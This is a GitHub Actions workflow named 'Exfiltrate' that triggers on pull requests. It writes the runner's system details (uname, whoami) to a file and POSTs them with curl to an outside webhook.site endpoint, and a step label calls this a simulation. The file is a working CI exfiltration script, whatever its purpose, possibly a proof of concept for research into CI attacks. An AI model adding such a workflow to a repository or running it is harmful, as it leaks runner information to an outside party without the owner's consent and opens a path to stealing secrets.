name: Exfiltrate

on:
  pull_request

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    env:
      TITLE: ${{ github.event.pull_request.title }}

    steps:
      - name: Simulate title usage and extract info
        run: |
          echo "Extracted title: ${TITLE}"
          uname -a > out.txt
          whoami >> out.txt
          curl -X POST --data-binary @out.txt https://webhook.site/d8f9da06-9850-4694-980a-317afd578c36
